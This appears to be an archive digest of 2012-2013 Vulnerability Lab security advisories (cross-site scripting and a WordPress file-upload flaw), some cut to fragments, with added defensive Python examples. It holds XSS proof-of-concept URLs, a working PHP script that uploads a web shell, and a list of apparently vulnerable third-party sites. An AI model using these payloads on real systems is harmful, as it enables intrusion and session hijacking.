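TAG = re.compile(r"<[^>]*>")   # a complete markup tag, used for the post-render check
MIN_LEN, MAX_LEN = 3, 30       # assumed group-name bounds; the real %2/%3 values are not on the page

# The advisory's PoC string (angle brackets restored).
POC = "<iframe src=a%20<img src=http://www.vulnerability-lab.com/gfx/logo-header.png>"


def naive_sanitize(value):
    """Model of the flawed filter the advisory describes: the decoded value is
    handled chunk by chunk on spaces, the first chunk that looks like markup has
    its angle brackets removed, and processing stops there. Everything after the
    %20 split is copied through untouched."""
    chunks = unquote(value).split(" ")
    for i, chunk in enumerate(chunks):
        if "<" in chunk or ">" in chunk:
            chunks[i] = chunk.replace("<", "").replace(">", "")
            break          # only the first suspicious chunk is ever looked at
    return " ".join(chunks)


def naive_error_message(value):
    """The 'incorrect length' message with the half-filtered value echoed raw."""
    return f"['{naive_sanitize(value)}'] has incorrect length."


def hardened_error_message(value):
    """Hardened version: decode once, validate the length of the whole decoded
    value, and HTML-escape the entire value before it is reflected. Returns
    None when the name is acceptable."""
    decoded = unquote(value)
    if MIN_LEN <= len(decoded) <= MAX_LEN:
        return None
    safe = html.escape(decoded, quote=True)
    return (f"['{safe}'] has incorrect length. "
            f"Group name must have between {MIN_LEN} and {MAX_LEN} characters.")


def contains_markup(rendered):
    """Post-render check: does the message still contain a complete tag?"""
    return TAG.search(rendered) is not None
```

With a single tag the naive filter appears to work, which is what step 1 above observes; with the split string the `<img ...>` after the space survives, which is step 1.2. The hardened handler never decides tag by tag: it escapes the whole value at the point where it is written into HTML, so the number of tags or splits in the input is irrelevant.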


Risk:
=
The security risk of the local persistent software vulnerability is estimated 
as medium(-).


Credits:

Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri 
(b...@vulnerability-lab.com)



Manage Engine Exchange Reporter v4.1 - Multiple Web Vulnerabilites

2012-11-19 Thread Vulnerability Lab
=alert(VL)/
When the user browses the alarms page in the control panel the persistent 
injected script code will be 
executed out of the web application context.

1.2
PoC:
http://exchangereporterplus.127.0.0.1:8080/exchange/ReportsIndex.do
?selectedTab=reports&reportCategoryID=3+<iframe src=http://www.vuln-lab.com 
onload=alert(VL)></iframe>

The attacker can go to reports and insert own malicious script code inside of 
the search report box to exploit the service application.


Risk:
=
1.1
The security risk of the persistent input validation vulnerability is estimated 
as medium(+).

1.2
The security risk of the client side cross site vulnerabilities are estimated 
as low(+).


Credits:

Vulnerability Laboratory [Research Team] - Ibrahim El-Sayed (the_storm) 
[st...@vulnerability-lab.com] [iel-sayed.blogspot.com]






SonicWALL CDP 5040 v6.x - Multiple Web Vulnerabilities

2012-11-20 Thread Vulnerability Lab
Title:
==
SonicWALL CDP 5040 v6.x - Multiple Web Vulnerabilities


Date:
=
2012-11-19


References:
===
http://www.vulnerability-lab.com/get_content.php?id=549


VL-ID:
=
549


Common Vulnerability Scoring System:

3.5


Introduction:
=
Tapeless Enterprise-Level Data Backup and Protection, Without the Price Tag. 
Automatic, real-time data backup for 
servers, laptops and PCs. Features include file versioning, fast data recovery, 
and automatic offsite backup 
capabilities to protect businesses against disasters. SonicWALL® Continuous 
Data Protection (CDP) v6 is a next-
generation data backup and disaster recovery solution that automatically 
preserves and protects business-relevant 
data assets against loss from file, device, and location based disasters. With 
support for Windows®, Linux® and 
Mac OS® through a single Web GUI, CDP provides granular, globally enforced 
policy controls over the entire backup 
operation. Unmatched flexibility enables IT administrators to dictate what 
information to backup, what to exclude 
and how the information should be maintained to adhere to recovery and 
compliance requirements. A sophisticated 
new fileset backup methodology combined with agent-based data de-duplication 
moves and stores only unique data 
blocks. This speeds the backup process and optimizes bandwidth usage while 
maintaining total information continuity 
and the ability to flexibly restore multiple revisions. SonicWALL Continuous 
Data Protection v6 offers the 
comprehensive data protection organizations demand and the power administrators 
need for vigilant data backup 
and disaster recovery.

(Copy of the Vendor Homepage: 
http://sonicwall.com/emea/backup_and_recovery.html)


Abstract:
=
The Vulnerability Lab Research Team discovered multiple vulnerabilities in 
SonicWall's Continuous Data Protection v6.x & 5040 appliance application.


Report-Timeline:

2012-05-04: Researcher Notification & Coordination
2012-05-08: Vendor Notification 1
2012-08-10: Vendor Notification 2
2012-08-16: Vendor Response/Feedback
2012-11-01: Vendor Fix/Patch by Check
2012-11-19: Public Disclosure


Status:

Published


Affected Products:
==
SonicWall
Product: Continuous Data Protection GUI v5040 6.0.x


Exploitation-Technique:
===
Remote


Severity:
=
Medium


Details:

Multiple persistent input validation vulnerabilities are detected in SonicWall's 
Continuous Data Protection v6.x & 5040 appliance application.
The vulnerability allows a remote attacker or local low privileged user 
account to inject/implement malicious persistent script code 
on the application side of the appliance application. 

The vulnerabilities are located in the network, accounts management and system 
settings modules with the bound vulnerable label 
delAppl (name, username & servername) parameters. An attacker can inject 
script code as name, username or servername via the add function 
to manipulate the vulnerable module with malicious persistent web context. The 
persistent script code will be executed when the victim 
views the vulnerable module listing (output|index).

Successful exploitation of the vulnerability results in session hijacking 
(customer/manager/admin) or stable (persistent) module 
context manipulation. Exploitation requires low user interaction and a low 
privileged web application user account.

Vulnerable Module(s):
[+] Network > Settings [Name]
[+] BMR > Accounts [Username]
[+] System > Settings [Server]

Vulnerable Parameter(s):
[+] label delAppl - Name
[+] label delAppl - Username
[+] label delAppl - Servername


Proof of Concept:
=
The persistent input validation vulnerabilities can be exploited by remote 
attackers with local low privileged user accounts and 
low required user interaction. For demonstration or reproduce ...

Review: Network > Settings > ADD > [Name] - label delAppl - Name

<label for=delAppl_0>[PERSISTENT SCRIPT CODE!]</label></span></td><td 
class=tableLineContrast 
name=ip><span><label for=delAppl_0>192.168.150.216</label></span></td><td 
class=tableLineContrast name=netmask><span><label for=delAppl_0>
255.255.255.0</label></span></td><td class=tableLineContrast 
name=gateway><span><label 
for=delAppl_0>192.168.150.1</label></span></td><td class=tableLineContrast 
nowrap=""><a 
class=swlEventEdit href=# title="Edit Entry"><img class=actionIcon 
width=20 height=20 border=0 alt="Edit this entry" 
src=images/edit.gif/></a></td><td><input type=hidden name=itemId 
value=undefined></input></td></tr></tbody></table></iframe></label>


Review: BMR > Accounts > [Username] - label delAppl - Username

<label for=delAppl_0>[PERSISTENT SCRIPT CODE!]</label></span></td><td 
class=tableLineContrast 
><span><label for=delAppl_0>

ManageEngine ServiceDesk 8.0 - Multiple Vulnerabilities

2012-11-21 Thread Vulnerability Lab
Title:
==
ManageEngine ServiceDesk 8.0 - Multiple Vulnerabilities


Date:
=
2012-11-15


References:
===
http://www.vulnerability-lab.com/get_content.php?id=689


VL-ID:
=
689


Common Vulnerability Scoring System:

3.5


Introduction:
=
ServiceDesk Plus integrates your help desk requests and assets to help you 
manage your IT effectively. It helps you 
implement ITIL best practices and troubleshoot IT service requests faster. 
ServiceDesk Plus is a highly customizable, 
easy-to-implement help desk software. More than 10,000 IT managers worldwide 
use ServiceDesk Plus to manage their IT 
help desk and assets. ServiceDesk Plus is available in 23 different languages.

(Copy of the Vendor Homepage: 
http://www.manageengine.com/products/service-desk/)


Abstract:
=
The Vulnerability Laboratory Research Team discovered multiple web 
vulnerabilities in ManageEngine's ServiceDesk Plus v8.0.


Report-Timeline:

2012-11-15: Public or Non-Public Disclosure


Status:

Published


Exploitation-Technique:
===
Remote


Severity:
=
Medium


Details:

Multiple persistent input validation vulnerabilities are detected in 
ManageEngine's ServiceDesk Plus v8.0 web application.
The bugs allow remote attackers to implement/inject malicious script code on 
the application side (persistent). 
Two vulnerabilities are located in the my details and request new incident 
modules of the web front-end with the bound 
vulnerable name, subject and description parameters. Exploitation requires low 
user interaction & a low privileged 
customer web application user account. The second part of the bugs is located 
in the New Contract, Access points and 
Create Solution modules of the admin/moderator back-end with the bound 
vulnerable title, asset name, contract name, description 
or support name parameters. Successful exploitation of the vulnerability can lead to 
session hijacking (customer/manager/admin), persistent 
phishing or stable (persistent) web context manipulation.


Vulnerable Module(s):   Customer/User/Moderator Front-End
[+] My Details - [Name]
[+] Requests - New Incident - [Subject] - 
[Description] 



Vulnerable Module(s):   Admin/Moderator Back-End
[+] Solution - Create Solution - [Title]
[+] Assets - IT Assets - Access points - [Asset name]
[+] Contract - New Contract - [Contract Name] - 
[Description] - [name] - [Support]


Proof of Concept:
=
The persistent input validation vulnerability can be exploited by remote 
attackers with low required user interaction 
& a low privileged user account. For demonstration or reproduce ...

The vulnerability in the Requester account can be exploited by many different 
methods. The first attack vector can be 
launched by creating a request and injecting malicious code into the subject 
and description fields of the request. When 
the victim views the requests and rests the mouse cursor on the request 
name, the code gets executed in the small 
pop-up window that contains the Subject and Description information of the 
request. Another way to attack the admin is to 
edit the details of the requester account and inject the malicious code into the 
Name field. After that, the attacker 
creates a request. Once the admin views the requests, the code gets executed in 
the requester name field.


Risk:
=
The security risk of the persistent input validation vulnerabilities is 
estimated as medium(+).


Credits:

Vulnerability Laboratory [Research Team] - Ibrahim El-Sayed (the_storm) 
[st...@vulnerability-lab.com] [iel-sayed.blogspot.com]




FortiGate FortiDB 2kB 1kC 400B - Cross Site Vulnerability

2012-12-03 Thread Vulnerability Lab
/fortidb/vascan/list.jsf?conversationContext=1%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C
http://utm-waf.127.0.0.1:1339/fortidb/network/router.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C
http://utm-waf.127.0.0.1:1339/fortidb/mapolicymgmt/editPolicyProfile.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C
http://utm-waf.127.0.0.1:1339/fortidb/mapolicymgmt/maPolicyMasterList.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C


Solution:
=
The vulnerability can be prevented by parsing the Java number format exception 
output listing & the mkey application value.

2012-10-24: Vendor Fix/Patch


Risk:
=
The security risk of the non-persistent cross site scripting vulnerability is 
estimated as medium(-).


Credits:

Vulnerability Laboratory [Research Team]  -Benjamin Kunz Mejri 
(rem...@vulnerability-lab.com)






FortiWeb 4kC,3kC,1kC VA - Cross Site Vulnerabilities

2012-12-03 Thread Vulnerability Lab
Title:
==
FortiWeb 4kC,3kC,1kC  VA - Cross Site Vulnerabilities


Date:
=
2012-12-01


References:
===
http://www.vulnerability-lab.com/get_content.php?id=702


VL-ID:
=
702


Common Vulnerability Scoring System:

2.1


Introduction:
=
FortiWeb web application firewalls protect, balance, and accelerate your web 
applications, databases, and any 
information exchanged between them. Whether you are protecting applications 
delivered over a large enterprise, 
service provider, or cloud-based provider network, FortiWeb appliances will 
reduce deployment time and 
simplify security management. Fortinet's FortiWeb™ has passed ICSA Web 
Application Firewall Certification. 
The latest model being tested is FortiWeb 1000C. ICSA Labs certifications are 
evidence of FortiWeb's commitment 
to uphold the industry's highest security standards. Achieving this 
certification ensures that FortiWeb™ customers 
benefit from best practices in the security industry for all their Web 
application needs.

(Copy of the Vendor Homepage: http://www.fortinet.com/products/fortiweb/ )



Abstract:
=
The Vulnerability Laboratory Research Team discovered multiple cross site 
scripting vulnerabilities in 
Fortinet's FortiWeb 4000C, 3000C/3000CFsx, 1000C, 400C & Virtual Appliance.


Report-Timeline:

2012-10-01: Researcher Notification & Coordination
2012-10-11: Vendor Notification
2012-10-05: Vendor Response/Feedback
2012-11-11: Vendor Fix/Patch
2012-12-01: Public or Non-Public Disclosure


Status:

Published


Affected Products:
==
Fortinet
Product: FortiWeb Application Series v4000C, 3000C/3000CFsx, 1000C, 400C & 
Virtual Appliance


Exploitation-Technique:
===
Remote


Severity:
=
Medium


Details:

A non-persistent cross site scripting vulnerability is detected in Fortinet's 
FortiWeb 4000C, 3000C/3000CFsx, 1000C, 400C & Virtual Appliance.
The vulnerability allows remote attackers to hijack website customer, moderator 
or admin sessions with low or medium required user interaction 
and without a local privileged application user account. The vulnerability is 
located in the Regular Expression - Validation (pcre_expression/validate) 
module with the bound vulnerable redir and mkey parameters. Successful 
exploitation results in client-side account theft, client-side phishing & 
client-side appliance module context request manipulation.


Vulnerable Module(s):
[+] Regular Expression - Validation Module 
(pcre_expression/validate)

Vulnerable Parameter(s):
[+] redir
[+] mkey


Proof of Concept:
=
The client side cross site scripting vulnerability can be exploited by remote 
attackers without an application user account and 
with medium required user interaction. For demonstration or reproduce ...

Code Review: Regular Expression - Validation Module (mkey & redir)

<tr><td>
<table class=footer cellpadding=0 cellspacing=0>
<tr><td>
<input class=button type=button value=Return onclick="if (window.opener) 
{window.close(); 
} else {document.location='/waf/pcre_expression/validate'}">
</td></tr>
</table>
</td></tr>
<input type=hidden name=mkey size=22 maxlength=22 
value=0[CLIENT SIDE SCRIPT CODE EXECUTION!])> 
<input type=hidden name=validated value=-1>
<input type=hidden name=redir value=/success>
</form>
</table>
</td>

... or

<tr><td>
<table class=footer cellpadding=0 cellspacing=0>
<tr><td>
<input class=button type=button value=Return onclick="if (window.opener) 
{window.close(); 
} else {document.location='/waf/pcre_expression/validate'}">
</td></tr>
</table>
</td></tr>
<input type=hidden name=mkey size=22 maxlength=22 
value=0[CLIENT SIDE SCRIPT CODE EXECUTION!])> 
<input type=hidden name=validated value=-1>
<input type=hidden name=redir value=/success>
</form>
</table>
</td>



PoC:
https://fortiweb.127.0.0.1:1336/waf/pcre_expression/validate?redir=/success&mkey=0%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VL%22%29%20%3C
https://fortiweb.127.0.0.1:1336/waf/pcre_expression/validate?redir=/success%20%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VL%22%29%20%3C&mkey=0


Solution:
=
The vulnerability can be patched by parsing the mkey and redir (success) 
parameter values handled by the vulnerable Regular Expression - Validation module.

2012-11-11: Vendor Fix/Patch


Risk:
=
The security risk of the non-persistent cross site scripting vulnerabilities 
is estimated as low(+)|(-)medium.


Credits:

Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri 
(b...@vulnerability-lab.com)



Enterpriser16 LoadBalancer v7.1 - Multiple Web Vulnerabilities

2012-12-19 Thread Vulnerability Lab
 failed the validation.
<br>
'<iframe [PERSISTENT INJECTED SCRIPT CODE!]>' is not a valid IP address.
</em>
</p>

URL: 
http://loadbalancer.127.0.0.1:8080/lbadmin/config/physicaladv.php?mnp=editsubmnp=epat=1355527441l=e



Risk:
=
The security risk of the persistent input validation vulnerabilities is 
estimated as medium(+).



Credits:

Vulnerability Laboratory [Research Team] - Ibrahim El-Sayed (the_storm) 
[st...@vulnerability-lab.com] [iel-sayed.blogspot.com]






Log Analyzer 3.6.0 - Cross Site Scripting Vulnerability

2012-12-28 Thread Vulnerability Lab
Title:
==
Log Analyzer 3.6.0 - Cross Site Scripting Vulnerability


Date:
=
2012-12-20


References:
===
http://www.vulnerability-lab.com/get_content.php?id=792
Vendor: 
http://loganalyzer.adiscon.com/security-advisories/loganalyzer-cross-site-scripting-vulnerability-in-oracle_query-paramater


VL-ID:
=
792


Common Vulnerability Scoring System:

1.5


Introduction:
=
LogAnalyzer is part of Adiscon`s MonitorWare line of monitoring applications. 
It runs both under Windows and Unix/Linux. 
The database can be populated by MonitorWare Agent, WinSyslog or EventReporter 
on the Windows side and by rsyslog on 
the Unix/Linux side. LogAnalyzer itself is free, GPLed software (as are some 
other members of the product line).

(Copy of the Vendor Homepage: http://loganalyzer.adiscon.com/ )


Abstract:
=
An independent vulnerability laboratory researcher discovered a cross site 
scripting vulnerability in the LogAnalyzer v3.6.0 web application.


Report-Timeline:

2012-12-20: Public or Non-Public Disclosure


Status:

Published


Exploitation-Technique:
===
Remote


Severity:
=
Low


Details:

A client-side cross-site scripting vulnerability is detected in the LogAnalyzer 
3.6.0 web application.
The vulnerability allows a remote attacker with high required user interaction 
to force client-side XSS requests.

The vulnerability is located in the asktheoracle.php file with the bound 
vulnerable oracle_query parameter. 
An attacker can force client-side requests that execute arbitrary script code 
via the oracle_query parameter.

Successful exploitation of the vulnerability results in client-side execution 
of the injected script, client-side phishing,
client-side module context manipulation and unauthorized external redirects.

Vulnerable File(s):
[+] asktheoracle.php

Vulnerable Parameter(s):
[+] oracle_query


Proof of Concept:
=
The client-side cross site scripting vulnerability can be exploited by remote 
attackers with medium or high required user interaction 
and without a privileged application user account.

http://192.168.1.10:8080/loganalyzer-3.6.0/asktheoracle.php?type=searchstr&oracle_query=[CLIENT SIDE SCRIPT CODE!]

Note: The 'oracle_query' parameter is not sanitized properly on the 
asktheoracle.php page.


Solution:
=
Upgrade to the latest version of Log Analyzer 3.6.1


Risk:
=
The security risk of the client-side cross site scripting web vulnerability is 
estimated as low(+).


Credits:

Mohd Izhar Ali - [http://johncrackernet.blogspot.com]



SonicWall Email Security 7.4.1.x - Persistent Web Vulnerability

2012-12-28 Thread Vulnerability Lab




Risk:
=
The security risk of the persistent web vulnerabilities is estimated as 
medium(+).


Credits:

Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri 
(b...@vulnerability-lab.com)






Wordpress Valums Uploader - File Upload Vulnerability

2013-01-22 Thread Vulnerability Lab
Title:
==
Wordpress Valums Uploader - File Upload Vulnerability


Date:
=
2013-01-04


References:
===
http://www.vulnerability-lab.com/get_content.php?id=817


VL-ID:
=
817


Common Vulnerability Scoring System:

7.5


Abstract:
=
The independent laboratory researcher (jingo-bd) discovered a remote file 
upload vulnerability in the Wordpress `Valums Uploader` application.


Report-Timeline:

2013-01-04: Public Disclosure


Status:

Published


Exploitation-Technique:
===
Remote


Severity:
=
High


Details:

A file upload vulnerability is detected in the Wordpress `Valums Uploader` 
application module.
The vulnerability allows remote attackers to upload files such as web shells 
and then access them without authorization after 
the upload to compromise the application system.

The vulnerability is located in the Valums uploader module when processing 
upload requests sent via POST.
Attackers can upload their own files without authorization to compromise the 
web application or the system DBMS.

Exploitation of the file upload vulnerability requires no user interaction and 
can be carried out without a privileged 
application user account. Successful exploitation of the remote file upload 
vulnerability results in system and DBMS compromise.

Vulnerable Module(s):
[+] Valums Uploader


Proof of Concept:
=
The remote vulnerability can be exploited by remote attackers without required 
user interaction and without a privileged application user account.
For demonstration or to reproduce ...

<?php

$uploadfile = "bangla.php";
$ch = curl_init("http://localhost/wordpress/VALUMS_UPLOADER_PATH/php.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('qqfile' => "@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print $postResult;

?>

Shell Access: http://localhost/wp-content/uploads/2013/01/bangla.php
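The handler described above takes a POST with one file field and writes it under the web root without asking who sent it or what it contains. As an added example, not Valums Uploader or WordPress code, the following Python shows the server-side checks such an endpoint needs before it stores anything: an authenticated caller, a name without path separators, an extension allowlist, and a content signature that matches the claimed type. The sample payloads, file names and the ALLOWED table are constructed for the demonstration.

```python
"""Added example (not Valums Uploader or WordPress code): the server-side checks an
upload handler needs before it writes request content into a web-served directory."""
import os
import secrets
from typing import Dict, Tuple

# Constructed sample payloads standing in for uploaded request bodies.
PNG_SAMPLE = b"\x89PNG\r\n\x1a\n" + b"constructed image data"
SCRIPT_SAMPLE = b"<?php echo 'constructed, never executed'; ?>"

# Allowlist: extension -> leading byte signature the content must carry.
# Anything not listed is refused, whatever name or MIME type the client supplies.
ALLOWED: Dict[str, bytes] = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}


def check_upload(filename: str, content: bytes, authenticated: bool) -> Tuple[bool, str]:
    """Return (accepted, reason) for one multipart file field.

    Order matters: an anonymous caller is refused before the file is even looked at,
    which is the gap the advisory describes (upload without any application account)."""
    if not authenticated:
        return False, "upload requires an authenticated user"
    base = os.path.basename(filename)
    if base != filename or base in ("", ".", ".."):
        return False, "path separators in file name"
    ext = base.rsplit(".", 1)[-1].lower() if "." in base else ""
    if ext not in ALLOWED:
        return False, f"extension not allowed: {ext or '(none)'}"
    if not content.startswith(ALLOWED[ext]):
        return False, "content does not match claimed type"
    return True, "ok"


def storage_name(ext: str) -> str:
    """Server-chosen file name: random token plus the validated extension.
    The client-supplied name is never reused, so it cannot steer where the file lands."""
    return f"{secrets.token_hex(16)}.{ext}"


def demo() -> Dict[str, Tuple[bool, str]]:
    """Constructed cases mirroring the advisory: a script upload, an anonymous upload,
    a double extension, a traversal attempt, and one legitimate image."""
    return {
        "script_as_php": check_upload("bangla.php", SCRIPT_SAMPLE, True),
        "anonymous_image": check_upload("logo.png", PNG_SAMPLE, False),
        "double_extension": check_upload("shell.php.jpg", SCRIPT_SAMPLE, True),
        "traversal_name": check_upload("../logo.png", PNG_SAMPLE, True),
        "legit_image": check_upload("logo.png", PNG_SAMPLE, True),
    }


if __name__ == "__main__":
    for case, (ok, why) in demo().items():
        print(f"{case}: {'accepted' if ok else 'refused'} ({why})")
```

Even with these checks, the stored file should land in a directory the web server will not execute scripts from, or outside the web root entirely and be served through a download handler; the checks reduce what gets written, the storage location decides what a mistake costs.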


Reference(s): 

http://www.xxx.ca/wp/wp-content/themes/lightspeed/framework/_scripts/valums_uploader/php.php

http://www.xxx.co.uk/wp-content/themes/eptonic/functions/jwpanel/scripts/valums_uploader/php.php

http://www3.xxx.com/v2/wp-content/themes/nuance/functions/jwpanel/scripts/valums_uploader/php.phps


Risk:
=
The security risk of the unauthorized shell upload exploit is estimated as 
high(+).


Credits:

JingoBD - (http://facebook.com/bdcyberarmy)
Greetz: ManInDark,Rex0Man,Evil AXE,Bedu33n,NEEL,AXIOM, All Of My BCA Friends 
and BANGLADESHI Hacker Team.



nCircle PureCloud Vulnerability Scanner - Multiple Web Vulnerabilities

2013-01-29 Thread Vulnerability Lab
[PERSISTENT/NON-PERSISTENT INJECTED SCRIPT CODE!])+%3C%22%5D%7D]

Response Header:
Date[Mon, 24 Dec 2012 20:13:25 GMT]
Server[Apache]
Content-Language[en]
Content-Encoding[gzip]
Vary[Accept-Language,Cookie,Accept-Encoding]
X-Frame-Options[SAMEORIGIN]
Content-Length[181]
Keep-Alive[timeout=15, max=76]
Connection[Keep-Alive]
Content-Type[application/json]


1.2
The server-side (persistent) web vulnerability can be exploited by remote 
attackers and local privileged application user accounts with 
low user interaction. For demonstration or to reproduce ...

PoC:
[VALID IP]%20'+%20[PERSISTENT SCRIPT CODE!]+...
[VALID NAME]%20'+%20[PERSISTENT SCRIPT CODE!]+...


Solution:
=
Parse the exception-handling error output listing and disallow error echoes of 
the requested web context.
To fix the vulnerability, parse the content of the input fields in the add 
devices module and restrict the input fields with a secure filter mask. 
Also parse the name & IP scan index output listing and restrict the input of 
the requested web context scan listing.

2012-01-28: Vendor Fix/Patch by nCircle Dev


Risk:
=
1.1
The security risk of the client- and server-side post injection web 
vulnerability in the exception handling and listing is estimated as medium(+).

1.2
The security risk of the persistent input validation vulnerability in the scan 
index listing is estimated as medium(+).


Credits:

Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri 
(b...@vulnerability-lab.com)






Fortinet FortiMail 400 IBE - Multiple Web Vulnerabilities

2013-01-29 Thread Vulnerability Lab
/FEAdmin.html#SystemBlackWhiteList


Module: Bounce Verification - Username
URL:
https://209.87.230.132:1443/admin/FEAdmin.html#AsBounceverifyKeyCollection

<div id="ext-gen7197" class="ext-mb-content"><span id="ext-gen4185" 
class="ext-mb-text">
Invalid user name: <iframe id="ext-gen19608" [PERSISTENT INJECTED SCRIPT 
CODE!];) = =[PERSISTENT INJECTED SCRIPT CODE!]) </iframe></span>



1.2
The persistent vulnerability can be exploited by remote attackers with a 
privileged application account and 
low required user interaction. For demonstration or to reproduce ...


Module: Upload or Import - Local Certificate - Certificate name
URL:
https://209.87.230.132:1443/admin/FEAdmin.html#SysCertificateDetailCollection

<div id="ext-gen38011" class="x-grid3-body"><div id="ext-gen38041" 
class="x-grid3-row x-grid3-row-selected" style="width: 1158px;">
<table class="x-grid3-row-table" style="width: 1158px;" border="0" cellpadding="0" 
cellspacing="0"><tbody><tr><td id="ext-gen38095" class="x-grid3-col x-grid3-cell 
x-grid3-td-mkey x-grid3-cell-first" style="width:248px;" tabindex="0"><div 
id="ext-gen38036" class="x-grid3-cell-inner x-grid3-col-mkey" 
unselectable="on">[PERSISTENT INJECTED SCRIPT CODE AS CERTIFICATE 
NAME!]</div></td>
<td class="x-grid3-col x-grid3-cell x-grid3-td-subject" style="width: 726px;" 
tabindex="0"><div id="ext-gen38068" class="x-grid3-cell-inner x-grid3-col-subject" 
unselectable="on">/[PERSISTENT INJECTED SCRIPT CODE AS CERTIFICATE 
VIA INFORMATION!]</div></td>
<td id="ext-gen38085" class="x-grid3-col x-grid3-cell x-grid3-td-status" 
style="width:148px;" tabindex="0"><div id="ext-gen38086" class="x-grid3-cell-inner 
x-grid3-col-status" unselectable="on">OK</div></td>
<td id="ext-gen38084" class="x-grid3-col x-grid3-cell x-grid3-td-isReferenced 
x-grid3-cell-last" style="width:28px;" tabindex="0"><div 
class="x-grid3-cell-inner x-grid3-col-isReferenced" unselectable="on"><img 
src="images/gray-ball.png" alt="0" align="absmiddle" 
border="0"></div></td></tr></tbody></table></div>
<div id="ext-gen38040" class="x-grid3-row x-grid3-row-alt" style="width: 1158px;">
<table class="x-grid3-row-table" style="width: 1158px;" border="0" cellpadding="0" 
cellspacing="0"><tbody><tr><td class="x-grid3-col x-grid3-cell x-grid3-td-mkey 
x-grid3-cell-first" style="width:248px;" tabindex="0"><div id="ext-gen38037" 
class="x-grid3-cell-inner x-grid3-col-mkey" 
unselectable="on">[PERSISTENT INJECTED SCRIPT CODE AS CERTIFICATE 
NAME!]</div></td>
<td class="x-grid3-col x-grid3-cell x-grid3-td-subject" style="width: 726px;" 
tabindex="0"><div id="ext-gen38039" class="x-grid3-cell-inner x-grid3-col-subject" 
unselectable="on">[PERSISTENT INJECTED SCRIPT CODE AS CERTIFICATE 
VIA INFORMATION!]</div></td>
<td class="x-grid3-col x-grid3-cell x-grid3-td-status" style="width:148px;" 
tabindex="0"><div id="ext-gen38102" class="x-grid3-cell-inner x-grid3-col-status" 
unselectable="on">Default</div></td>
<td id="ext-gen38101" class="x-grid3-col x-grid3-cell x-grid3-td-isReferenced 
x-grid3-cell-last" style="width:28px;" tabindex="0"><div id="ext-gen38083" 
class="x-grid3-cell-inner x-grid3-col-isReferenced" unselectable="on"><img 
id="ext-gen38100" src="images/red-ball.png" alt="1" align="absmiddle" 
border="0"></div></td></tr></tbody></table></div></div>



Solution:
=
1.1
The exception-handling vulnerability can be fixed by parsing the full content 
instead of stopping at the first close tag. Restrict the input fields to allowed 
characters.

1.2
The persistent vulnerability in the certificate import/upload module can be 
patched by parsing the certificate name and info input fields. 
Do not forget to also parse the vulnerable output listing of the certificate 
name and certificate information.
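The "parsing" that the solutions in this digest call for, from the FortiWeb redir/mkey form and the LogAnalyzer oracle_query echo through the nCircle exception output and the FortiMail certificate name listing above, comes down to two controls: encode every reflected or stored value for the HTML context it lands in, and reduce a redirect parameter to an allowlisted path before echoing it. The following Python is an added example, not code from Fortinet, Adiscon, nCircle or Vulnerability Lab; the allowlist paths are taken from the FortiWeb review, and the probe strings stand in for the [SCRIPT CODE] placeholders and are constructed.

```python
"""Added example (not Fortinet, Adiscon or nCircle code): contextual output encoding
plus redirect-target validation for the parameter types named in these advisories."""
import html
from typing import Dict, FrozenSet
from urllib.parse import urlsplit

# Relative paths the validate form may return to: a constructed allowlist built from
# the two paths visible in the FortiWeb review above.
ALLOWED_REDIRECTS: FrozenSet[str] = frozenset({"/success", "/waf/pcre_expression/validate"})


def encode_attr(value: str) -> str:
    """Encode for a double-quoted HTML attribute value (e.g. a hidden input's value=)."""
    return html.escape(value, quote=True)


def encode_text(value: str) -> str:
    """Encode for HTML element content (error messages, grid cells, listings)."""
    return html.escape(value, quote=False)


def safe_redirect(redir: str, allowed: FrozenSet[str] = ALLOWED_REDIRECTS) -> str:
    """Accept only a same-site relative path from the allowlist; anything else becomes '/'.
    Absolute URLs, scheme-relative '//host' forms and javascript: URIs all carry a scheme
    or a netloc and are refused before the allowlist is even consulted."""
    parts = urlsplit(redir)
    if parts.scheme or parts.netloc or not parts.path.startswith("/"):
        return "/"
    return parts.path if parts.path in allowed else "/"


def render_hidden_fields(mkey: str, redir: str) -> str:
    """The hidden inputs from the FortiWeb review, with mkey encoded for attribute
    context and redir reduced to an allowlisted path before it is echoed back."""
    return (
        f'<input type="hidden" name="mkey" value="{encode_attr(mkey)}">\n'
        f'<input type="hidden" name="redir" value="{encode_attr(safe_redirect(redir))}">'
    )


def render_error(label: str, user_value: str) -> str:
    """Echo a rejected value inside an error message (the nCircle / FortiMail pattern)
    without letting the browser interpret it as markup."""
    return f"<p><em>{encode_text(label)}: '{encode_text(user_value)}' is not valid.</em></p>"


def demo() -> Dict[str, str]:
    """Constructed probe strings standing in for the [SCRIPT CODE] placeholders above."""
    probe = '0"><b>probe</b>'
    return {
        "hidden_fields": render_hidden_fields(probe, '/success"><b>probe</b>'),
        "error_message": render_error("Invalid user name", "<b>probe</b>"),
        "external_redirect": safe_redirect("https://attacker.invalid/"),
        "scheme_relative": safe_redirect("//attacker.invalid/"),
        "allowed_redirect": safe_redirect("/success"),
    }


if __name__ == "__main__":
    for name, rendered in demo().items():
        print(f"{name}:\n{rendered}\n")
```

The encoder is chosen by the destination, not by the source: the same certificate name needs attribute encoding when it fills a value= and text encoding when it fills a grid cell, which is why the two helpers are kept separate rather than running one "sanitize on input" filter that cannot know where the value will later be written.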


Risk:
=
The security risk of the exception-handling and input filter bypass 
vulnerability is estimated as high(-).


Credits:

Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri 
(b...@vulnerability-lab.com)



Kohana Framework v2.3.3 - Directory Traversal Vulnerability

2013-01-29 Thread Vulnerability Lab
Title:
==
Kohana Framework v2.3.3 - Directory Traversal Vulnerability


Date:
=
